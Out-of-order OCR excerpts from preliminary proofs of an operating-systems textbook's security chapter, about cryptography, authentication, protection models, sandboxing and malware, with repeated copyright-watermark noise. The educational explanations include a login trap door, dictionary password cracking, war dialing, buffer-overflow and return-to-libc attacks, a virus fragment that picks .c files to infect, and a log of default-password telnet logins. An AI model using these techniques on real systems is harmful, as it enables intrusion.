105. e is straightforward The system call instruc tion is replaced by a call to a special module called a reference monitor on the same pass that the dynamic address checks are inserted or if the source code is available by linking with a special library that calls the reference monitor instead of making system calls Either way the reference monitor examines each PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lPEYSHINSESin any form or by any means electronic 99 mechanical photocopying recording or likewise attempted call and decides if it is safe to perform If the call is deemed accept able such as writing a temporary file in a designated scratch directory the call is allowed to proceed If the call is known to be dangerous or the reference monitor cannot tell the applet is killed If the reference monitor can tell which applet called it a single reference monitor somewhere in memory can handle the requests from all applets The reference monitor normally learns about the permis sions from a configuration file Interpretation The second way to run untrusted applets is to run them interpretively and not let t
106. e login name zzzzz no matter what was in the password file The normal code in the login program might look something like Fig 9 22 a The trap door would be the change to Fig 9 22 b What the call to strcmp does is check if the login name is zzzzz If so the login succeeds no matter what password is typed If this trap door code were inserted by a program mer working for a computer manufacturer and then shipped with its computers the programmer could log into any computer made by his company no matter who owned it or what was in the password file The same holds for a programmer working for the OS vendor The trap door simply bypasses the whole authentica tion process One way for companies to prevent trap doors is to have code reviews as stan dard practice With this technique once a programmer has finished writing and testing a module the module is checked into a code database Periodically all the programmers in a team get together and each one gets up in front of the group to explain what his code does line by line Not only does this greatly increase the chance that someone will catch a trap door but it raises the stakes for the pro grammer since being caught red handed is probably not a plus for his career If the programmers protest too much when this is proposed having two coworkers check each other s code is also a possibility PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be p
107. e needed for example having the camera fire a flash not for illumination purposes but to see if the pupil contracts in response or to see if PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 4 storage in a retrieval systeAnL5F H amp GSMILGISATIRANY form or by any means electronic 45 mechanical photocopying recording or likewise Spring Pressure plate Figure 9 21 A device for measuring finger length the amateur photographer s dreaded red eye effect shows up in the flash picture but is absent when no flash is used Amsterdam Airport has been using iris recog nition technology since 2001 to enable frequent travelers to bypass the normal immigration line A somewhat different technique is signature analysis The user signs his name with a special pen connected to the computer and the computer compares it to a known specimen stored online or on a smart card Even better is not to compare the signature but compare the pen motions and pressure made while writing it A good forger may be able to copy the signature but will not have a clue as to the exact order in which the strokes were made or at what speed and what pressure A scheme that relies on
108. e public key cryptography also exist 9 2 5 Trusted Platform Module All cryptography requires keys If the keys are compromised all the security based on them is also compromised Storing the keys securely is thus essential How does one store keys securely on a system that is not secure One proposal that the industry has come up with is a chip called the TPM Trusted Platform Modules which is a cryptoprocessor with some nonvolatile storage inside it for keys The TPM can perform cryptographic operations such encrypting blocks of plaintext or decrypting blocks of ciphertext in main memory It can also verify digital signatures By doing all these operations in specialized hardware they become much faster and are likely to be used more widely Some PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 12 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise computers already have TPM chips and many more are likely to have them in the future TPM is extremely controversial because different parties have different ideas who will control the TPM and what it will protect from whom Micr
109. eak into a system to cause damage whereas the latter is a program written by such a person and then released into the world hoping it causes damage Intruders try to break into specific systems e g one belonging to some bank or the Pentagon to steal or destroy particular data whereas a virus writer usually wants to cause damage in general and does not care to whom 9 1 3 Accidental Data Loss In addition to threats caused by malicious intruders valuable data can be lost by accident Some of the common causes of accidental data loss are 1 Acts of God fires floods earthquakes wars riots or rats gnawing backup tapes 2 Hardware or software errors CPU malfunctions unreadable disks or tapes telecommunication errors program bugs 3 Human errors incorrect data entry wrong tape or disk mounted wrong program run lost disk or tape or some other mistake Most of these can be dealt with by maintaining adequate backups preferably far away from the original data While protecting data against accidental loss may seem mundane compared to protecting against clever intruders in practice prob ably more damage is caused by the former than the latter 9 2 BASICS OF CRYPTOGRAPHY Cryptography plays an important role in security Many people are familiar with newspaper cryptograms which are little puzzles in which each letter has been systematically replaced by a different one These have as much to do with modern cryptography as ho
110. ed secret key They may even have to get together physically for one to give it to the other To get around this problem public key cryptography is used Diffie and Hellman 1976 This system has the property that distinct keys are used for encryption and decryption and that given a well chosen encryption key it is virtually impossible to discover the corresponding decryption key Under these circumstances the encryption key PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 2 storage in a retrievaBASEMS Oran RIE ON Rod PUY or by any means electronic mechanical photocopying recording or likewise can be made public and only the private decryption key kept secret Just to give a feel for public key cryptography consider the following two questions Question 1 How much is 314159265358979 x 314159265358979 Question 2 What is the square root of 3912571506419387090594828508241 Most sixth graders given a pencil paper and the promise of a really big ice cream sundae for the correct answer could answer question 1 in an hour or two Most adults given a pencil paper and the promise of a lifetime 50 tax cut could not solve question 2 at all without using
111. els All these ideas about formal models and provably secure systems sound great but do they actually work In a word No Even in a system which has a proper security model underlying it and which has been proven to be secure and is cor rectly implemented security leaks can still occur In this section we discuss how information can still leak out even when it has been rigorously proven that such leakage is mathematically impossible These ideas are due to Lampson 1973 Lampson s model was originally formulated in terms of a single timesharing system but the same ideas can be adapted to LANs and other multiuser environ ments In the purest form it involves three processes on some protected machine The first process is the client which wants some work performed by the second one the server The client and the server do not entirely trust each other For example the server s job is to help clients with filling out their tax forms The clients are worried that the server will secretly record their financial data for example maintaining a secret list of who earns how much and then selling the list The server is worried that the clients will try to steal the valuable tax pro gram The third process is the collaborator which is conspiring with the server to indeed steal the client s confidential data The collaborator and server are typi cally owned by the same person These three processes are shown in Fig 9 14 The object of this
112. ems so that when one of them is selected the macro is executed In Microsoft Office macros can contain entire programs in Visual Basic which is a complete programming language The macros are inter preted rather than compiled but that only affects execution speed not what they can do Since macros may be document specific Office stores the macros for each document along with the document Now comes the problem Virgil writes a document in Word and creates a macro that he attaches to the OPEN FILE function The macro contains a macro virus He then e mails the document to the victim who naturally opens it assuming the e mail program has not already done this for him Opening the document causes the OPEN FILE macro to execute Since the macro can contain an arbitrary program it can do anything such as infect other Word documents erase files and more In all fairness to Microsoft Word does give a warning when opening a file with macros but most users do not understand what this means and continue opening anyway Besides legitimate documents may also contain macros And there are other programs that do not even give this warning making it even harder to detect a virus With the growth of e mail attachments sending documents with viruses em bedded in macros is an immense problem Such viruses are much easier to write than concealing the true boot sector somewhere in the bad block list hiding the virus among the interrupt vectors and cap
113. en reads the password file which is just a series of ASCII lines one per user until it finds the line containing the user s login name If the encrypted password contained in this line matches the encrypted password just computed the login is permitted otherwise it is refused The advan tage of this scheme is that no one not even the superuser can look up any users passwords because they are not stored in unencrypted form anywhere in the PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 38 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise system However this scheme can also be attacked as follows A cracker first builds a dictionary of likely passwords the way Morris and Thompson did At leisure these are encrypted using the known algorithm It does not matter how long this process takes because it is done in advance of the break in Now armed with a list of password encrypted password pairs the cracker strikes He reads the pub licly accessible password file and strips out all the encrypted passwords These are compared to the encrypted passwords in his l
114. er or loadable kernel module The rootkit can easily replace a large com plex and frequently changing driver with a new one that contains the old one plus the rootkit 4 Library rootkits Another place a rootkit can hide is in the system library for example in libc in Linux This location gives the malware the opportunity to inspect the arguments and return values of system calls modifying them as need be to keep itself hidden 5 Application rootkits Another place to hide a rootkit is inside a large application program especially one that creates many new files while running user profiles image previews etc These new files are good places to hide things and no one thinks it strange that they exist The five places rootkits can hide are illustrated in Fig 9 30 Library Lib ib ti Li ibrary lorary lorar ibrary App y r App i App ae j App O He Operating Operating system Operating Operating Operating system Hypervisor 4 system system system HW Es HW BIOS HW BIOS HW BIOS HW BIOS a b c d e Figure 9 30 Five places a rootkit can hide PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission
115. eract with the applets starting and stopping them feeding them data and so on If each applet is put in its own process the whole thing will not work Furthermore putting an applet in its own address space does not make PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lPEYSHINSEDSin any form or by any means electronic o7 mechanical photocopying recording or likewise it any harder for the applet to steal or damage data If anything it is easier since nobody is watching in there Various new methods of dealing with applets and mobile code in general have been proposed and implemented Below we will look at two of these meth ods sandboxing and interpretation In addition code signing can also be used to verify the source of the applet Each one has its own strengths and weaknesses Sandboxing The first method called sandboxing attempts to confine each applet to a lim ited range of virtual addresses enforced at run time Wahbe et al 1993 It works by dividing the virtual address space up into equal size regions which we will call sandboxes Each sandbox must have the property that all of its addresses sha
116. es Armed with one of those books entitled 4096 Names for Your New Baby plus a telephone book full of last names a cracker can easily compile a computerized list of potential login names appropriate to the country being attacked ellen_smith might work fine in the U S or England but probably not in Japan PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 34 storage in a retrieval system or HASMMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise Of course guessing the login name is not enough The password has to be guessed too How hard is that Easier than you might think The classic work on password security was done by Morris and Thompson 1979 on UNIX systems They compiled a list of likely passwords first and last names street names city names words from a moderate sized dictionary also words spelled backward license plate numbers and short strings of random characters They then com pared their list to the system password file to see if there were any matches Over 86 of all passwords turned up in their list A similar result was obtained by Klein 1990 Lest anyone think that better quality
117. ess system call to test for exe cute permission examine the file name to see if it ends in c This code will do it char file_name int len file_name dp gt d_name len strlen file_name if stremp amp file_name len 2 c 0 infect s 39 They probably cannot tell but they can guess that XORing one word within the virus with the rest will produce valid machine code Their computers can just try each virus word in turn and see if any of them produce valid machine code To slow down this process Virgil can use a better encryption algorithm such as using different keys for the odd and even words and then rotating the first word left by some number of bits determined by a hash function on the keys rotating the second word that number of bits plus one etc 40 The compressor is needed to compress other executable programs as part of the pro cess of infecting them 41 Most viruses do not want to infect a file twice It might not even work Therefore it is important to be able to detect the virus in a file to see if it is already infected All the techniques used to make it hard for antivirus software to detect viruses also make it hard for the virus itself to tell which files have been infected 42 First running the fdisk program from the hard disk is a mistake It may be infected and it may infect the boot sector It has to be run from the original CD ROM or a write protected floppy disk Second the restored file
118. executed It is known as a return to libe attack Suppose that a buffer overflow or format string attack has overwritten the return address of the current function but cannot execute the attacker supplied code on the stack Is there some place else it could return to in order to comprom ise the machine It turns out there is Almost all C programs are linked with the usually shared library libc which contains key functions most C programs need One on these functions is strcpy which copies an arbitrary byte string from any address to any other address The nature of this attack is to trick strcpy into copy ing the attacker s program which is often called shellcode to the data segment and have it executed there Let s now look at the nuts and bolts of how the attack works In Fig 9 25 a we see the stack just after the main program has called a function f Let us assume that this program is running with superuser privileges i e is SETUID root and has an exploitable bug that allows the attacker to get his shellcode into memory as illustrated in Fig 9 25 b Here we show it on the top of the stack where it cannot be executed What the attack also has to do besides getting the shellcode onto the stack is to overwrite the four shaded words shown in Fig 9 25 b The lowest of these was formerly the return address back to main but is now the address of strcpy so when f returns it goes back to strcpy At that point the stack poin
119. exercise is to design a system in which it is impossible for the server process to leak to the collaborator process the information that it has legiti mately received from the client process Lampson called this the confinement problem Client Server Collaborator Encapsulated server N Kernel Kernel Covert channel a b Figure 9 14 a The client server and collaborator processes b The encap sulated server can still leak to the collaborator via covert channels From the system designer s point of view the goal is to encapsulate or con fine the server in such a way that it cannot pass information to the collaborator PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 28 storage in a retrieval system or SHAsMMREIBY in any form or by any means elecfrddidP 9 mechanical photocopying recording or likewise Using a protection matrix scheme we can easily guarantee that the server cannot communicate with the collaborator by writing a file to which the collaborator has read access We can probably also ensure that the server cannot communicate with the collaborator using the system s interprocess communication mechanism Unfortunately more s
120. f the user that are hard to forge These are called biometrics Pankanti et al 2000 For example a fingerprint or a voiceprint reader hooked up to the computer could ver ify the user s identity A typical biometrics system has two parts enrollment and identification Dur ing enrollment the user s characteristics are measured and the results digitized Then significant features are extracted and stored in a record associated with the user The record can be kept in a central database e g for logging in to a remote computer or stored on a smart card that the user carries around and inserts into a remote reader e g at an ATM machine The other part is identification The user shows up and provides a login name Then the system makes the measurement again If the new values match the ones PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 44 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise sampled at enrollment time the login is accepted otherwise it is rejected The login name is needed because the measurements are not exact so it is difficult to index them and t
121. fect all of the machines on it There is a lot more to be said about viruses In particular how they try to hide and how antivirus software tries to flush them out We will come back to these topics when we get into defenses against malware later in this chapter 9 7 3 Worms The first large scale Internet computer security violation began in the evening of Nov 2 1988 when a Cornell graduate student Robert Tappan Morris released a worm program into the Internet This action brought down thousands of comput ers at universities corporations and government laboratories all over the world before it was tracked down and removed It also started a controversy that has not yet died down We will discuss the highlights of this event below For more technical information see the paper by Spafford 1989 For the story viewed as a police thriller see the book by Hafner and Markoff 1991 The story began sometime in 1988 when Morris discovered two bugs in Berkeley UNIX that made it possible to gain unauthorized access to machines all over the Internet Working alone he wrote a self replicating program called a worm that would exploit these errors and replicate itself in seconds on every PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should
122. formation can be squirreled away in a file for the cracker to pick up at his leisure later In this way a cracker who breaks into one machine with weak security can often leverage this into a way to break into other machines with stronger security Increasingly many break ins are being done by technically naive users who are just running scripts they found on the Internet These scripts either use brute force attacks of the type described above or try to exploit known bugs in specific programs Real hackers scornfully refer to them as script kiddies Usually the script kiddie has no particular target and no particular PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 4 storage in a retrieval systeAn OF HANNIGAN form or by any means electronic 37 mechanical photocopying recording or likewise LBL gt telnet elxsi ELXSI AT LBL LOGIN root PASSWORD root INCORRECT PASSWORD TRY AGAIN LOGIN guest PASSWORD guest INCORRECT PASSWORD TRY AGAIN LOGIN uucp PASSWORD uucp WELCOME TO THE ELXSI COMPUTER AT LBL Figure 9 18 How a cracker broke into a U S Dept of Energy computer at LBL information he is trying to steal He is just looking for
123. formation is stored in computer systems the need to protect it is becoming increasingly important Guarding this information against unauthorized usage is therefore a major concern of all operating systems Unfor tunately it is also becoming increasingly difficult due to the widespread accep tance of system bloat and the accompanying bugs as being normal phenomenon In the following sections we will look at a variety of issues con cerned with security and protection some of which have analogies to real world protection of information on paper but some of which are unique to computer systems In this chapter we will examine computer security as it applies to 1 PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 2 storage in a retrieval system or HAsSMMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise operating systems The issues relating to operating system security have changed radically in the past two decades Up until the early 1990s few people had a computer at home and most computing was done at companies universities and other organizations on multiuser computers ranging from large mainframes to m
124. fted string containing a program it may be possible to get the program onto the stack and then get it executed The C library function gets which reads a string of unknown size into a fixed size buffer but without checking for overflow is notorious for being subject to this kind of attack Some compilers even detect the use of gets and warn about it Now comes the really bad part Suppose that the program being attacked is SETUID root in UNIX or has Administrator power in Windows The inserted code can now make a couple of system calls to convert the attacker s shell file on the disk into SETUID root so that when it is executed it has superuser power Alternatively it can now map in a specially prepared shared library that can do all kinds of damage Or it can simply issue an exec system call to overlay the current PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 52 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise program with the shell creating a shell with superuser powers Worse yet it can download a program or script over the Internet and store it on the disk It c
125. g exist One that works on almost any UNIX system without modifying the kernel is described by Van t Noordende et al 2007 In a nutshell the scheme uses the normal UNIX debugging facilities with the jailer being the debugger and the prisoner being the debuggee Under these circumstances the debugger can instruct the kernel to encapsulate the debuggee and pass all of its system calls to it for inspection 9 8 5 Model Based Intrusion Detection Yet another approach to defending a machine is to install an IDS Intrusion Detection System There are two basic kinds of IDSes one focused on inspect ing incoming network packets and one focused on looking for anomalies on the CPU We briefly mentioned the network IDS in the context of firewalls earlier now we will say a few words about a host based IDS Space limitations prevent us from surveying the many kinds of host based DSes Instead we will briefly sketch one type to give an idea of how they work This one is called static model based intrusion detection Wagner and Dean 2001 It can be imple mented using the jailing technique discussed above among other ways In Fig 9 36 a we see a small program that opens a file called data and reads it one character at a time until it hits a zero byte at which time it prints the number of nonzero bytes at the start of the file and exits In Fig 9 36 b we see a graph of the system calls made by this program where print calls write What doe
126. g up the computer and replacing the chip If the flash memory chip is soldered to the parentboard probably the whole board has to be thrown out and a new one purchased We could go on and on but you probably get the point If you want more hor ror stories just type malware to any search engine A question many people ask is Why does malware spread so easily There are several reasons First something like 90 of the world s computers run ver sions of a single operating system Windows which makes it an easy target If there were ten operating systems out there each with 10 of the market spread ing malware would be vastly harder In the biological world diversity is also a good defense Second from its earliest days Microsoft has put a lot of emphasis on making Windows easy to use by nontechnical people For example Windows systems are normally configured to allow login without a password whereas UNIX systems historically always required a password although this excellent practice is weak ening as Linux tries to become more like Windows In numerous other ways there are trade offs between good security and ease of use and Microsoft has con sistently chosen ease of use as a marketing strategy If you think security is more important than ease of use stop reading now and go configure your cell phone to require a PIN code before it will make a call nearly all of them are capable of this If you do not know how just download
127. ghts such as read and execute capabilities both kernel and cryptographically protected usually have generic rights which are applicable to all objects Examples of generic rights are 1 Copy capability create a new capability for the same object 2 Copy object create a duplicate object with a new capability 3 Remove capability delete an entry from the C list object unaffected PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 20 storage in a retrieval system or 4HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise 4 Destroy object permanently remove an object and a capability A last remark worth making about capability systems is that revoking access to an object is quite difficult in the kernel managed version It is hard for the sys tem to find all the outstanding capabilities for any object to take them back since they may be stored in C lists all over the disk One approach is to have each capa bility point to an indirect object rather than to the object itself By having the indirect object point to the real object the system can always break that connec tion thus invalidating the capabi
128. gs in again This time it works But in the meantime Mal has acquired another login name password pair By logging in at many computers and starting the login spoofer on all of them he can collect many passwords The only real way to guard against this is to have the login sequence start with a key combination that user programs cannot catch Windows uses CTRL ALT DEL for this purpose If a user sits down at a computer and starts out by typing CTRL ALT DEL the current user is logged out and the system login program is started There is no way to bypass this mechanism 9 6 EXPLOITING CODE BUGS Having looked at some ways insiders can breach security now it is time to start our study of how outsiders can attack and subvert the operating system from outside generally over the Internet Almost all of the attack mechanism take advantage of bugs in the operating system or in some popular application program such as Internet Explorer or Microsoft Office The typical scenario is that some body discovers a bug in the operating system and then finds a way to exploit it to compromise computers that are running the defective code Although every exploit involves a specific bug in a specific program there are several general categories of bugs that occur over and over and are worth studying to see how attacks work In the following sections we will examine a number of these methods Please note that since this is a book on operating systems the focus
129. he eye cannot easily distinguish 7 bit color from 8 bit color Once the image file has gotten past the censor the receiver just strips off all the low order bits applies the decryption and decompression algorithms and recovers the original 734 891 bytes Hiding the existence of infor mation like this is called steganography from the Greek words for covered writing Steganography is not popular with governments that try to restrict communication among their citizens but it is popular with people who believe strongly in free speech Viewing the two images in black and white with low resolution does not do justice to how powerful the technique is To get a better feel for how steganogra phy works the author has prepared a demonstration including the full color image of Fig 9 16 b with the five plays embedded in it The demonstration can PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publicatoni is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs dnk GAANA inha hor by any means electronic 31 mechanical photocopying recording or likewise be found at www cs vu nl ast Click on the covered writing link under the head ing STEGANOGRAPHY DEMO Then follow the instructions on that page
130. hem get actual control of the hardware This is the approach used by Web browsers Web page applets are commonly written in Java which is a normal programming language or in a high level scripting language such as safe TCL or Javascript Java applets are first compiled to a virtual stack oriented machine language called JVM Java Virtual Machine It is these JVM applets that are put on the Web page When they are downloaded they are inserted into a JVM interpreter inside the browser as illustrated in Fig 9 38 Virtual address space OxFFFFFFFF Untrusted applet Sandbox Interpreter Trusted applet Web browser 0 Figure 9 38 Applets can be interpreted by a Web browser The advantage of running interpreted code over compiled code is that every instruction is examined by the interpreter before being executed This gives the interpreter the opportunity to check if the address is valid In addition system calls are also caught and interpreted How these calls are handled is a matter of the security policy For example if an applet is trusted e g it came from the local disk its system calls could be carried out without question However if an applet is not trusted e g it came in over the Internet it could be put in what is effectively a sandbox to restrict its behavior High level scripting languages can also be interpreted Here no machine addresses are used so there is no danger of a script trying to access memory in an
131. hen search the index Also two people may have the same characteristics so requiring the measured characteristics to match those of a specific user is stronger than just requiring it to match those of any user The characteristic chosen should have enough variability that the system can distinguish among many people without error For example hair color is not a good indicator because too many people share the same color Also the charac teristic should not vary over time and with some people hair color does not have this property For example a person s voice may be different due to a cold and a face may look different due to a beard or make up not present at enrollment time Since later samples are never going to match the enrollment values exactly the system designers have to decide how good the match has to be to be accepted In particular they have to decide whether it is worse to reject a legitimate user once in a while or let an imposter get in once in a while An e commerce site might decide that rejecting a loyal customer might be worse than accepting a small amount of fraud whereas a nuclear weapons site might decide that refusing access to a genuine employee was better than letting random strangers in twice a year Now let us take a brief look at some of the biometrics that are in actual use now Finger length analysis is surprisingly practical When this is used each computer has a device like the one of Fig 9 21 The user inserts
132. her prior to any prohibited reproduction SEC 9 4 storage in a retrieval systef BF H amp GSMHIEGSnTiRGNY form or by any means electronic 41 mechanical photocopying recording or likewise has to be complicated enough that k cannot be deduced even given a large set of observations Cryptographic hash functions are good choices with the argument being the XOR of r and k 9 4 2 Authentication Using a Physical Object The second method for authenticating users is to check for some physical object they have rather than something they know Metal door keys have been used for centuries for this purpose Nowadays the physical object used is often a plastic card that is inserted into a reader associated with the computer Normally the user must not only insert the card but also type in a password to prevent someone from using a lost or stolen card Viewed this way using a bank s ATM Automated Teller Machine starts out with the user logging in to the bank s com puter via a remote terminal the ATM machine using a plastic card and a pass word currently a 4 digit PIN code in most countries but this is just to avoid the expense of putting a full keyboard on the ATM machine Information bearing plastic cards come in two varieties magnetic stripe cards and chip cards Magnetic stripe cards hold about 140 bytes of information written on a piece of magnetic tape glued to the back of the card This information can be read out by the terminal an
133. hich case the browser automatically examines the signature Of course to verify it the browser need s the software vendor s public key which normally accompanies the code along with a certificate signed by some CA vouching for the authenticity of the public key If the browser has the CA s public key already stored it can verify the certi ficate on its own If the certificate is signed by a CA unknown to the browser it will pop up a dialog box asking whether to accept the certificate or not PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lPEYSHISSEDSin any form or by any means electronic 93 mechanical photocopying recording or likewise Software vendor User Signature generation Signature verification Sig ee oe is aae e Signature Signature encrypt H Signature H2 decrypt Signature Accept Program if H1 H2 Figure 9 34 How code signing works 9 8 4 Jailing An old Russian saying is Trust but Verify Clearly the old Russian clearly had software in mind Even though a piece of software has been signed a good attitude is to verify that it is behaving correctly anyway A techni
134. hich one to use next time Using them backward prevents this danger 32 No it is not feasible The problem is that array bounds are not checked Arrays do not line up with page boundaries so the MMU is not of any help Furthermore making a kernel call to change the MMU on every procedure call would be prohibitively expen sive 33 The compiler could insert code on all array references to do bounds checking This feature would prevent buffer overflow attacks It is not done because it would slow down all programs significantly In addition in C it is not illegal to declare an array of size 1 as a procedure parameter and then reference element 20 but clearly the actual array whose address has been passed had better have at least 20 elements 34 If the capabilities are used to make it possible to have small protection domains no otherwise yes If an editor for example is started up with only the capabilities for the file to be edited and its scratch file then no matter what tricks are lurking inside the PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication ip protested by Copyright and written permission should be obtained from the publisher prior to ayy Fyonibited reproduction CHAP 9 storage in a retrieval system oft aGuRicevESin any form or by any means electronic mech
135. his publicatoni is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs nE GAANA inha hor by any means electronic mechanical photocopying recording or likewise documents cleared as confidential and lower A process running on behalf of a user acquires the user s security level Since there are multiple security levels this scheme is called a multilevel security system The Bell La Padula model has rules about how information can flow 1 The simple security property A process running at security level k can read only objects at its level or lower For example a general can read a lieutenant s documents but a lieutenant cannot read a general s documents 2 The property A process running at security level k can write only objects at its level or higher For example a lieutenant can append a message to a general s mailbox telling everything he knows but a general cannot append a message to a lieutenant s mailbox telling everything he knows because the general may have seen top secret documents that may not be disclosed to a lieutenant Roughly summarized processes can read down and write up but not the reverse If the system rigorously enforces these two properties it can be shown that no information can leak out from a higher security level to a lower one The pro perty was so named because in the original report the a
136. hould be obtained from the publisher prior to any prohibited reproduction SEC 9 4 storage in a retrieval systeAnL5F H amp GSMILGISATRANY form or by any means electronic 43 mechanical photocopying recording or likewise Remote computer 1 Challenge sent to smart card 2 Smart 3 Response sent back card computes response Smart card reader Figure 9 20 Use of a smart card for authentication fate is to use the ROM on the card not for a cryptographic protocol but for a Java interpreter The real cryptographic protocol is then downloaded onto the card as a Java binary program and run interpretively In this way as soon as one protocol is broken a new one can be installed worldwide in a straightforward way next time the card is used new software is installed on it A disadvantage of this approach is that it makes an already slow card even slower but as technology improves this method is very flexible Another disadvantage of smart cards is that a lost or stolen one may be subject to a side channel attack for example a power analysis attack By observing the electric power consumed during repeated encryption operations an expert with the right equipment may be able to deduce the key Measuring the time to encrypt with various specially chosen keys may also pro vide valuable information about the key 9 4 3 Authentication Using Biometrics The third authentication method measures physical characteristics o
137. iables casts user controlled storage allocation such as malloc and free and all array references are checked at run time Java programs are compiled to an intermediate binary code called JVM Java Virtual Machine byte code JVM has about 100 instructions most of which push objects of a specific type onto the stack pop them from the stack or com bine two items on the stack arithmetically These JVM programs are typically interpreted although in some cases they can be compiled into machine language for faster execution In the Java model applets sent over the Internet for remote execution are JVM programs When an applet arrives it is run through a JVM byte code verifier that checks if the applet obeys certain rules A properly compiled applet will automatically obey them but there is nothing to prevent a malicious user from writing a JVM applet in JVM assembly language The checks include 1 Does the applet attempt to forge pointers Does it violate access restrictions on private class members Does it try to use a variable of one type as another type Does it generate stack overflows or underflows i R SLIS Does it illegally convert variables of one type to another PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be
138. ial all 2 6 million phone numbers Crackers are not limited to California An Australian cracker tried the same thing Among the many systems he broke into was a Citibank computer in Saudi Arabia which allowed him to obtain credit card numbers and credit limits in one case 5 million and transaction records including at least one visit to a brothel A cracker colleague of his also broke into the bank and collected 4000 credit card numbers Denning 1999 If such information were misused the bank would undoubtedly emphatically and vigorously deny that it could possibly be at fault claiming that the customer must have disclosed the information The Internet has been a godsend to crackers It takes all the drudgery out of their work No more phone numbers to dial War dialing now works like this Every computer on the Internet has a 32 bit IP address used to identify it Peo ple usually write these addresses in dotted decimal notation as w x y z where each of the four components of the IP address is an integer from 0 to 255 in PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 4 storage in a retrieval systeAn OF HANNAS form or by any means electronic
